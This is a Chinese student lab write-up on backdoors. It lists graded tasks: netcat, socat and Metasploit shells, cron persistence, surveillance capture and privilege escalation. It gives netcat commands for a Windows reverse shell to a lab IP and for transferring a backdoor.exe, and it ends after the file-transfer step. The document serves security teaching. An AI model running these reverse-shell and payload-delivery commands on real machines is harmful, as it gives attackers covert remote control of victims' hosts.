Exp2:后门原理与实践
1 实践目标
任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
2 简单后门
2.1 Ncat
2.1.1Linux获得Win Shell
- Linux运行监听指令
nc -l -p 5117
- Windows反弹连接Linux
C:\Users\Game\Desktop\ncat\ncat.exe -e cmd.exe 192.168.43.118 5117
- Linux下看到Windows的命令提示
2.1.2Win获得Linux Shell
利用NC传送后门
传输文件步骤如下
- 在本机上执行命令
nc -l 9999 <backdoor.exe - 在接收文件的机器上执行命令
nc 192.168.43.118 9999 > backdoor.exe